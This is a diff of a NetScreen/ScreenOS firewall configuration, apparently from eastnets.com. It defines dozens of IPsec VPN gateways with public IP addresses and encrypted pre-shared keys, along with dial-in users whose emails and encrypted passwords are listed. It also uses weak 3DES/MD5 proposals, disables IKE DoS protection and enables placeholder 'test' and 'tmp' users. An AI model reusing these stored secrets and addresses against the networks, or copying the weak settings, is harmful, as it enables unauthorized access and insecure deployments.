+set group address "Untrust" "NWG_DXB_MGMT" comment "Allowd IP's to manage PK"
+set group address "Untrust" "NWG_DXB_MGMT" add "NW_ENDXB_HQ"
+set group address "Untrust" "NWG_DXB_MGMT" add "NW_ENSBDXB"
+set group address "Untrust" "NWG_DXB_MGMT" add "NW_ENSBDXB_Public"
+set group service "EN_SAG_Ports" comment "SAG Ports"
+set group service "EN_SAG_Ports" add "EN_SAG_FAct"
+set group service "EN_SAG_Ports" add "EN_SAG_FIN"
+set group service "EN_SAG_Service" comment "SAG Service"
+set group service "EN_SAG_Service" add "EN_SAG_FAct"
+set group service "EN_SAG_Service" add "EN_SAG_FIN"
+set group service "EN_SAG_Service" add "ICMP-ANY"
+set ippool "Default_Pool" 10.100.0.1 10.100.0.254
+set ippool "ENSB_MGMT_Pool" 10.100.200.1 10.100.200.10
+set ippool "ENSB_Support_Pool" 10.100.201.10 10.100.201.20
+set user "adesear" uid 12
+set user "adesear" ike-id u-fqdn "adesear@eastnets.com" share-limit 1
+set user "adesear" type  ike xauth
+set user "adesear" remote ippool "ENSB_MGMT_Pool"
+set user "adesear" password "3EAw5YSjNFeXBtsv7nCJ+JKyCanQlTc2SA=="
+unset user "adesear" type auth
+set user "adesear" "enable"
+set user "hkhan" uid 13
+set user "hkhan" ike-id u-fqdn "hkhan@eastnets.com" share-limit 1
+set user "hkhan" type  ike xauth
+set user "hkhan" remote ippool "ENSB_Support_Pool"
+set user "hkhan" password "y52jzNaSNADQmksdZzCiXQqdHEn59T/IQg=="
+unset user "hkhan" type auth
+set user "hkhan" "enable"
+set user "juy" uid 8
+set user "juy" ike-id u-fqdn "juy@eastnets.com" share-limit 1
+set user "juy" type  ike xauth
+set user "juy" remote ippool "ENSB_MGMT_Pool"
+set user "juy" password "A1DtwtZJN8cigbs+FBCgkt6tYJnqxG/uTw=="
+unset user "juy" type auth
+set user "juy" "enable"
+set user "mfarid" uid 4
+set user "mfarid" ike-id u-fqdn "mfarid@eastnets.com" share-limit 1
+set user "mfarid" type  ike xauth
+set user "mfarid" remote ippool "ENSB_MGMT_Pool"
+set user "mfarid" password "RqCPQYYTNcnqTps9NMC6JE5Zlrnvz6Htgg=="
+unset user "mfarid" type auth
+set user "mfarid" "enable"
+set user "test" uid 2
+set user "test" ike-id u-fqdn "test@test.test" share-limit 1
+set user "test" type  ike
+set user "test" "enable"
+set user "tmp" uid 3
+set user "tmp" ike-id u-fqdn "tmp@tmp.tmp" share-limit 1
+set user "tmp" type  ike
+set user "tmp" "enable"
+set user-group "Dialup_gourp" id 2
+set user-group "Dialup_gourp" location external
+set user-group "Dialup_gourp" type xauth 
+set user-group "ENSB_Support_Group" id 3
+set user-group "ENSB_Support_Group" user "hkhan"
+set user-group "ensb_mgmt_group" id 1
+set user-group "ensb_mgmt_group" user "adesear"
+set user-group "ensb_mgmt_group" user "juy"
+set user-group "ensb_mgmt_group" user "mfarid"
+set ike gateway "GW_ENSBDXB" address 80.227.254.205 Main outgoing-interface "ethernet0/2" preshare "V/1Z77I7N5UuF0siYAC8t0qvN3nIG3TpOM2aUMK1gnY0ZXCKcHdu9vc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSBDXB_ISDN" address 192.168.207.17 Main outgoing-interface "ethernet0/1" preshare "uapaaalhNHK3ngs3PlCSC/if8vnij5ZeUuInMqA/Q6e5sNDDfcieZBc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSBDXB_ISDN" cert peer-ca all
+set ike gateway  "GW_ENSBDXB_ISDN" nat-traversal
+set ike gateway "GW_ENSBDXB_ISDN" nat-traversal udp-checksum
+set ike gateway "GW_ENSBDXB_ISDN" nat-traversal keepalive-frequency 0
+set ike gateway "GW_PTSAAEAA_LL" address 213.132.40.101 id "PTSAAEAA@eastnets.com" Aggr outgoing-interface "ethernet0/2" preshare "YBVGBJw3NKol2esLEYC5HijvjjnQq+PhyN4QjSzkzrq7YoYIc8np1Ww=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_PTSAAEAA_ISDN" address 0.0.0.0 id "PTSAAEAA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "r6I0IL5jNxajTusmZECN/pK8g7nDUtY+LKnE0jtvuvCgwurASaOEG9o=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_PTSAAEAA_ISDN" nat-traversal
+set ike gateway "GW_KHYPPKKA_LL" address 210.2.139.34 Main outgoing-interface "ethernet0/2" preshare "zb5eZTZPN27GGzsdtFC17JsSSFnsON8afeaugtY4iyqv5I+xRB2K2MA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_KHYBPKKA_ISDN" address 0.0.0.0 id "KHYBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "2m7ZKSCTNrj0NJsR1QC11uXfJSnjHJW4bmL0BG7aLa+Blw0diYRgCrY=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_KHYBPKKA_ISDN" nat-traversal
+set ike gateway "GW_AIINPKKA_LL" address 203.130.2.203 Main outgoing-interface "ethernet0/2" preshare "z3B00C33NE0YPpsL/sCykO/QnRnS5mnFYLjFggS9oWOkEIMfLiIp5+Q=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_AIINPKKA_ISDN" address 0.0.0.0 id "AIINPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "Ie3HOgDLNxOdj9sBMKCMWvW45AnZwshQ1CqGA5Cc4WUZI/vYiLO6/HY=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_AIINPKKA_ISDN" nat-traversal
+set ike gateway "GW_BKIPPKKA_LL" address 210.2.139.58 Main outgoing-interface "ethernet0/2" preshare "E3dkZGJtNRBmWos4f4CFosHVRInyixhy/NoPR2nklBWoR9eEoBZzquU=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_BKIPPKKA_ISDN" address 0.0.0.0 id "BKIPPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "ny0c4WPpNff6DJsctBCN3ob282nRBbsFRMOj2SwuOTiQQoF6J6mMOOw=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_BKIPPKKA_ISDN" nat-traversal
+set ike gateway "GW_PLCOPKKA_LL" address 202.44.85.229 Main outgoing-interface "ethernet0/2" preshare "0nKQ0Z1NN+bWI+svF8CnEgF5xdn0611xt5b/CekuByxayTCG6Sto7pQ=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_PLCOPKKA_ISDN" address 0.0.0.0 id "PLCOPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "xKM49ZOFN5KHLOssMtCJSPaYsKnYORUtPRQa/y1f9cq71biXBzfW86o=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_PLCOPKKA_ISDN" nat-traversal
+set ike gateway "GW_SUMBPKKA_LL" address 203.101.171.34 Main outgoing-interface "ethernet0/2" preshare "MVaw2FfuNk9UDssjjoCZ/yxVUVnC8+giae46pWsVXpAqc0Y5xKw7ugk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SUMBPKKA_ISDN" address 0.0.0.0 id "DBHDPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "nDJrR4lPNhDWeKs27XCDCQLjrTn4v83uOrtwDJ5FjEvBRhij957Gofc=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_SUMBPKKA_ISDN" nat-traversal
+set ike gateway "GW_FDIBPKKA_LL" address 202.88.39.45 Main outgoing-interface "ethernet0/2" preshare "AcZQCuChNskTWcsguwC3/nRygLnIhTSAP3EkDbIMZAbDw5tOLpheiI8=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_FDIBPKKA_ISDN" address 0.0.0.0 id "FDIBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "H7TKN6SwNXsQpesI6hCVwZYAKen9/qW366kbqV7jeBeOP5ftNg3opoM=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_FDIBPKKA_ISDN" nat-traversal
+set ike gateway "GW_FAYSPKKA_LL" address 125.209.98.178 Main outgoing-interface "ethernet0/2" preshare "26ly5qEUNDbqQxstO2CXkSY7oPn4UQtH7HweA2RIlf3RJ3T27KQY+2s=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_FAYSPKKA_ISDN" address 0.0.0.0 id "FAYSPKKA@eastnets.com" Main outgoing-interface "ethernet0/1" preshare "hUeevc84N6ZN1Psg8wCLeldeYJnZ71Gzf1ujvfePBgPc1c/6KAukOeU=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_FAYSPKKA_ISDN" nat-traversal
+set ike gateway "GW_NIBPPKKA_LL" address 124.29.205.107 Main outgoing-interface "ethernet0/2" preshare "Ufd51GQnNj5X/VsVQ6CxEvMwzTnDEUBT3OrVfHFpciGNGJ5l8X4eKYU=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_NIBPPKKA_ISDN" address 0.0.0.0 id "NIBPPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "FvEj8dxGNPhZrvsb1iCkP8t64InsHjuGnICseq5BtJLk8iv2cDN3Aic=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_NIBPPKKA_ISDN" nat-traversal
+set ike gateway "GW_MEZNPKKA_LL" address 125.209.91.19 Main outgoing-interface "ethernet0/2" preshare "nTJ5Ws32NKjP2PsaPmCYE4jd0NnSYd/sUZt7Y0FMhzyLEvgWN5o9jpw=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_MEZNPKKA_ISDN" address 0.0.0.0 id "MEZNPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "5ItAdPm1Ncbk9wsUiiCIuBv9zbn+Y3R26/pSAooNpt6oU4qstPPFuxc=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_MEZNPKKA_ISDN" nat-traversal
+set ike gateway "GW_FWOMPKKA_LL" address 124.29.205.6 Main outgoing-interface "ethernet0/2" preshare "/rWK7/JqNJz/ZqsbxwCcEcB0vOnIQlF3CqIJa1rm87jtnRVrXe5gmAk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_FWOMPKKA_ISDN" address 0.0.0.0 id "FWOMPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "5k7i8H3oN9laQds+pTCauj7d+8nldFPrXtUDxtymthOYwFIvhjT2eAs=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_FWOMPKKA_ISDN" nat-traversal
+set ike gateway "GW_FAYSPKKA_DR_LL" address 58.27.253.14 Main outgoing-interface "ethernet0/2" preshare "ciBpuwT3N2nMnOslkuCOvbIdTSnUPK54613xhmkj4R+i6xxyZik/WFk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSB_MGMT_DIALIN" dialup "ensb_mgmt_group" Aggr outgoing-interface "ethernet0/2" preshare "5o8dLMTFNwbcJGsb8mCw/t0ahvne5vnyaOneXZOwMX867LnDty5GOuA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSB_MGMT_DIALIN" nat-traversal udp-checksum
+set ike gateway "GW_ENSB_MGMT_DIALIN" nat-traversal keepalive-frequency 5
+set ike gateway "GW_ENSB_MGMT_DIALIN" xauth
+set ike gateway "GW_ENSB_MGMT_DIALIN" xauth server auth-method chap pap
+unset ike gateway "GW_ENSB_MGMT_DIALIN" xauth do-edipi-auth
+set ike gateway "GW_BAHLPKKA_GWCP_LL" address 202.125.136.108 Main outgoing-interface "ethernet0/2" preshare "CTFR32fJNvBReCs8duCDevf4nxnMNB8qAGeRoXMwMhjQCxZBWjZlXnU=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_BAHLPKKA_DRCP_LL" address 117.20.16.142 Main outgoing-interface "ethernet0/2" preshare "X8VeSI+PNwYXwlsR4QCDqUG0knnwnKx3krqF/FbZcwW2kmR/doAfZQg=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_AIINPKKA_DRCP_LL" address 124.29.206.2 Main outgoing-interface "ethernet0/2" preshare "Ngzaj90JNQQZLws9CYCR7E+gPsnFWqinCgXYgZ0NJ3kXox6fDxCxtpc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_AIINPKKA1_LL" address 124.29.205.226 Main outgoing-interface "ethernet0/2" preshare "clR444+FNgOXE9soBsCTdswH4Fnc1I23+zCsqO/WLkMf7GsrC+XIzbA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_EGIBPKKA_ISDN" address 0.0.0.0 id "EGIBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "VIYB64K2NIgGYrsUC8Cno8rIM1n+Sx7ewGCWfCSqe2L7pr4ZaJY26qY=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_EGIBPKKA_ISDN" nat-traversal
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" dialup "ENSB_Support_Group" Aggr outgoing-interface "ethernet0/2" preshare "Ie1uh/pMNDkMB0szXACl4EHJYRnrCDflU6uWeStlmoh1FyY01tfgdZ4=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" nat-traversal udp-checksum
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" nat-traversal keepalive-frequency 5
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" xauth
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" xauth server auth-method chap pap
+unset ike gateway "GW_ENSB_SUPPORT_DIALIN" xauth do-edipi-auth
+set ike gateway "GW_JSBLPKKA_ISDN" address 0.0.0.0 id "JSBLPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "8ivbGZfRNeSwpSs8/SCHSP8g6vnBdknvtiQ+SAGeaGsbOXp+f/i5AuM=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_JSBLPKKA_ISDN" nat-traversal udp-checksum
+set ike gateway "GW_JSBLPKKA_ISDN" nat-traversal keepalive-frequency 0
+set ike gateway "GW_JSBLPKKA_LL" address 203.130.1.17 Main outgoing-interface "ethernet0/2" preshare "u5Kd/KmXNvq8IWsHo3C6O9++/cnHXssz5cchVdcCfYCiYqNHZtKuljc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SONEPKKA_LL" address 124.29.206.142 Main outgoing-interface "ethernet0/2" preshare "FagThSkwNxy/GYsOrBCIbDmiHCn8gv/ByKSWOWUMb9RxlyG6O9UESSk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SONEPKKA_ISDN" address 0.0.0.0 id "SONEPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "cG9mVURhNGf1Ohsc09CkR1wOgrnecAZU6SLoFieAIRDnV0X/+LHubx4=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_SONEPKKA_ISDN" nat-traversal
+set ike gateway "GW_UNILPKKA_DRCP_LL" address 103.247.124.141 Main outgoing-interface "ethernet0/2" preshare "+xY6MrF+NRlufwsPozCIXB5ZYuncUo+zfFb1jYnceB9sV9QIrTdzLXo=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_UNILPKKA_DRCP_ISDN" address 0.0.0.0 id "UNILPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "KBlcVkWwNiJ6XAsIp6CPxGotIInlzky3qTwOeBp6HYi+D4p71eIiK0w=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_UNILPKKA_DRCP_ISDN" nat-traversal
+set ike gateway "GW_MEZNPKKA_DR_LL" address 125.209.127.246 Main outgoing-interface "ethernet0/2" preshare "svPPJvR/N+n+1WsAuYCd6t9Js1nIzSwLDiQ5Uyp+WCadXskwdtYdL20=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_NIBPPKKA_LL2" address 115.186.127.22 Main outgoing-interface "ethernet0/2" preshare "gr4PioOaNuzxlosR0ACEOp6XJ6nXOi1yVdwEVYYZtcgQx+3Ew1Al/cM=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_NIBPPKKA_DRCP_LL" address 203.101.168.5 Main outgoing-interface "ethernet0/2" preshare "FiV4MpdnNlwjfYsrN/C2qQ22jnn9Sk6r5Bsgp+tx49/5mIwKwgfwJgI=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSBNOC_LL" address 80.227.254.242 Main outgoing-interface "ethernet0/2" preshare "W5sKIKyNN6WFQXsRtUCAa/gR5onQZJsgP5BbGHEmUmxXXGjgr/mcdN4=" proposal "pre-g2-3des-sha"
+set ike gateway "GW_SAUDPKKA_GWCP_LL" address 58.27.246.186 Main outgoing-interface "ethernet0/2" preshare "zLOt/8MaNxrzdHs1TaCd0dttt1n1WFVYacdi80vZRsH1r5sxQIBOCgI=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SAUDPKKA_DRCP_LL" address 58.27.246.194 Main outgoing-interface "ethernet0/2" preshare "B+bGtF+BNNCpO/sckcCDos7M0DnSJl3Hxbp+uaNxpWIyXpr20UsHea4=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SAUDPKKA_ISDN" address 0.0.0.0 id "SAUDPKKA@eastnets.com" Main outgoing-interface "ethernet0/1" preshare "jDQ62kYdNVmwNKs55iCVKrKQ6zn7Puq4Q3+SZUxR4HlJeb3iv+hRj/4=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_SAUDPKKA_ISDN" nat-traversal
+set ike gateway "GW_BKIPPKKA_DRCP_LL" address 125.209.120.202 Main outgoing-interface "ethernet0/2" preshare "2tj5qxsjNTnNjWsgDPCclQShSZn7ZPswveGb5fM1O+tdbLjY5IYEq9U=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_BURJPKKA_ISDN" address 0.0.0.0 id "BURJPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "xSdcf0MKNXtm6xsng/CrjbZAZnnS7XsZ2oS3dA+fRoPEHWTvRFFfXdQ=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_BURJPKKA_ISDN" nat-traversal
+set ike gateway "GW_BURJPKKA_DRCP_LL" address 202.147.191.34 Main outgoing-interface "ethernet0/2" preshare "z/fmbgcHNLMQxgsUfFCjhmp0kVnY7kgfTQKPnT/qxoLpku0AilacrRo=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DUIBPKKA_DRCP_LL" address 202.163.69.3 Main outgoing-interface "ethernet0/2" preshare "chsUuzG3N6tQVSsVtnCLE+sDxOnSqfvlXeCK3z8oBpmJB3iEsU1LgVk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DUIBPKKA_DRCP_ISDN" address 0.0.0.0 id "DUIBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "bbNhzCAsNeCqV2swztCoEkrUDfnRKVpV9n4lStUQF16Yxnn8dWnrjA4=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_DUIBPKKA_DRCP_ISDN" nat-traversal
+set ike respond-bad-spi 1
+unset ike ikeid-enumeration
+unset ike dos-protection
+unset ipsec access-session enable
+set ipsec access-session maximum 5000
+set ipsec access-session upper-threshold 0
+set ipsec access-session lower-threshold 0
+set ipsec access-session dead-p2-sa-timeout 0
+unset ipsec access-session log-error
+unset ipsec access-session info-exch-connected
+unset ipsec access-session use-error-log
+set xauth default ippool "Default_Pool"
+set vpn "VPN_ENSBDXB" gateway "GW_ENSBDXB" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_ENSBDXB" monitor optimized rekey
+set vpn "VPN_ENSBDXB" id 26 bind interface tunnel.3
+set vpn "VPN_ENSBDXB_ISDN" gateway "GW_ENSBDXB_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_ENSBDXB_ISDN" monitor optimized
+set vpn "VPN_ENSBDXB_ISDN" id 25 bind interface tunnel.4
+set vpn "VPN_PTSAAEAA_LL" gateway "GW_PTSAAEAA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PTSAAEAA_LL" monitor optimized rekey
+set vpn "VPN_PTSAAEAA_LL" id 4 bind interface tunnel.1
+set vpn "VPN_PTSAAEAA_ISDN" gateway "GW_PTSAAEAA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PTSAAEAA_ISDN" monitor optimized rekey
+set vpn "VPN_PTSAAEAA_ISDN" id 20 bind interface tunnel.2
+set vpn "VPN_KHYPPKKA_LL" gateway "GW_KHYPPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_KHYPPKKA_LL" monitor optimized rekey
+set vpn "VPN_KHYPPKKA_LL" id 31 bind interface tunnel.1
+set vpn "VPN_KHYBPKKA_ISDN" gateway "GW_KHYBPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_KHYBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_KHYBPKKA_ISDN" id 32 bind interface tunnel.2
+set vpn "VPN_BKIPPKKA_LL" gateway "GW_BKIPPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BKIPPKKA_LL" monitor optimized rekey
+set vpn "VPN_BKIPPKKA_LL" id 33 bind interface tunnel.1
+set vpn "VPN_BKIPPKKA_ISDN" gateway "GW_BKIPPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BKIPPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_BKIPPKKA_ISDN" id 34 bind interface tunnel.2
+set vpn "VPN_AIINPKKA_LL" gateway "GW_AIINPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA_LL" monitor optimized rekey
+set vpn "VPN_AIINPKKA_LL" id 64 bind interface tunnel.1
+set vpn "VPN_AIINPKKA_ISDN" gateway "GW_AIINPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_AIINPKKA_ISDN" id 36 bind interface tunnel.2
+set vpn "VPN_PLCOPKKA_LL" gateway "GW_PLCOPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PLCOPKKA_LL" monitor optimized rekey
+set vpn "VPN_PLCOPKKA_LL" id 86 bind interface tunnel.1
+set vpn "VPN_PLCOPKKA_ISDN" gateway "GW_PLCOPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PLCOPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_PLCOPKKA_ISDN" id 39 bind interface tunnel.2
+set vpn "VPN_SUMBPKKA_LL" gateway "GW_SUMBPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SUMBPKKA_LL" monitor optimized rekey
+set vpn "VPN_SUMBPKKA_LL" id 65 bind interface tunnel.1
+set vpn "VPN_SUMBPKKA_ISDN" gateway "GW_SUMBPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SUMBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_SUMBPKKA_ISDN" id 41 bind interface tunnel.2
+set vpn "VPN_FAYSPKKA_LL" gateway "GW_FAYSPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FAYSPKKA_LL" monitor optimized rekey
+set vpn "VPN_FAYSPKKA_LL" id 42 bind interface tunnel.1
+set vpn "VPN_FAYSPKKA_ISDN" gateway "GW_FAYSPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FAYSPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_FAYSPKKA_ISDN" id 43 bind interface tunnel.2
+set vpn "VPN_FDIBPKKA_LL" gateway "GW_FDIBPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FDIBPKKA_LL" monitor optimized rekey
+set vpn "VPN_FDIBPKKA_LL" id 44 bind interface tunnel.1
+set vpn "VPN_FDIBPKKA_ISDN" gateway "GW_FDIBPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FDIBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_FDIBPKKA_ISDN" id 45 bind interface tunnel.2
+set vpn "VPN_NIBPPKKA_LL" gateway "GW_NIBPPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_NIBPPKKA_LL" monitor optimized rekey
+set vpn "VPN_NIBPPKKA_LL" id 91 bind interface tunnel.1
+set vpn "VPN_NIBPPKKA_ISDN" gateway "GW_NIBPPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_NIBPPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_NIBPPKKA_ISDN" id 47 bind interface tunnel.2
+set vpn "VPN_MEZNPKKA_LL" gateway "GW_MEZNPKKA_LL" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_MEZNPKKA_LL" monitor optimized rekey
+set vpn "VPN_MEZNPKKA_LL" id 48 bind interface tunnel.1
+set vpn "VPN_MEZNPKKA_ISDN" gateway "GW_MEZNPKKA_ISDN" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_MEZNPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_MEZNPKKA_ISDN" id 49 bind interface tunnel.2
+set vpn "VPN_FWOMPKKA_LL" gateway "GW_FWOMPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FWOMPKKA_LL" monitor optimized rekey
+set vpn "VPN_FWOMPKKA_LL" id 50 bind interface tunnel.1
+set vpn "VPN_FWOMPKKA_ISDN" gateway "GW_FWOMPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FWOMPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_FWOMPKKA_ISDN" id 88 bind interface tunnel.2
+set vpn "VPN_FAYSPKKA_DR_LL" gateway "GW_FAYSPKKA_DR_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FAYSPKKA_DR_LL" monitor optimized rekey
+set vpn "VPN_FAYSPKKA_DR_LL" id 59 bind interface tunnel.1
+set vpn "VPN_ENSB_MGMT_DIALIN" gateway "GW_ENSB_MGMT_DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_ENSB_MGMT_DIALIN" monitor optimized rekey
+set vpn "VPN_BAHLPKKA_GWCP_LL" gateway "GW_BAHLPKKA_GWCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BAHLPKKA_GWCP_LL" monitor optimized rekey
+set vpn "VPN_BAHLPKKA_GWCP_LL" id 67 bind interface tunnel.1
+set vpn "VPN_BAHLPKKA_DRCP_LL" gateway "GW_BAHLPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BAHLPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_BAHLPKKA_DRCP_LL" id 68 bind interface tunnel.1
+set vpn "VPN_AIINPKKA_DRCP_LL" gateway "GW_AIINPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_AIINPKKA_DRCP_LL" id 69 bind interface tunnel.1
+set vpn "VPN_AIINPKKA1_LL" gateway "GW_AIINPKKA1_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA1_LL" monitor optimized rekey
+set vpn "VPN_AIINPKKA1_LL" id 84 bind interface tunnel.1
+set vpn "VPN_EGIBPKKA_ISDN" gateway "GW_EGIBPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_EGIBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_EGIBPKKA_ISDN" id 71 bind interface tunnel.2
+set vpn "VPN_EN _SUPPORT_DIALIN" gateway "GW_ENSB_SUPPORT_DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_JSBLPKKA_ISDN" gateway "GW_JSBLPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_JSBLPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_JSBLPKKA_ISDN" id 73 bind interface tunnel.2
+set vpn "VPN_JSBLPKKA_LL" gateway "GW_JSBLPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_JSBLPKKA_LL" monitor optimized rekey
+set vpn "VPN_JSBLPKKA_LL" id 111 bind interface tunnel.1
+set vpn "VPN_SONEPKKA_LL" gateway "GW_SONEPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SONEPKKA_LL" monitor optimized rekey
+set vpn "VPN_SONEPKKA_LL" id 76 bind interface tunnel.1
+set vpn "VPN_SONEPKKA_ISDN" gateway "GW_SONEPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SONEPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_SONEPKKA_ISDN" id 81 bind interface tunnel.2
+set vpn "VPN_UNILPKKA_DRCP_LL" gateway "GW_UNILPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_UNILPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_UNILPKKA_DRCP_LL" id 82 bind interface tunnel.1
